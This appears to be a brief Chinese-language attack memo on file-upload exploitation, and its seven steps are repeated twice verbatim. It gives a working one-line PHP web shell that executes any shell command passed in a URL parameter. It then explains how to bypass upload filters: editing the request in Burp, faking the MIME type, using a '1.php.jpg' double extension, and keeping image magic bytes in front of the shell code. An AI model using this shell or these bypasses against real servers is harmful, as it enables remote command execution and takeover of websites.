开门见山
1. 准备一个shell
<?php echo shell_exec($_GET['cmd']);?>
2. 上传文件
3. 利用shell
4. Burp抓包,1是文件大小,2是文件类型
5. mimetype判断文件类型
6. 使用1.php.jpg 绕过一些文件后缀检查
7. 图片1代码前几个字节标志文件的类型(jpg或者png),可以删除后面的内容,并替换成shell代码<?php echo shell_exec($_GET['cmd']);?>
1. 准备一个shell
<?php echo shell_exec($_GET['cmd']);?>
2. 上传文件
3. 利用shell
4. Burp抓包,1是文件大小,2是文件类型
5. mimetype判断文件类型
6. 使用1.php.jpg 绕过一些文件后缀检查
7. 图片1代码前几个字节标志文件的类型(jpg或者png),可以删除后面的内容,并替换成shell代码<?php echo shell_exec($_GET['cmd']);?>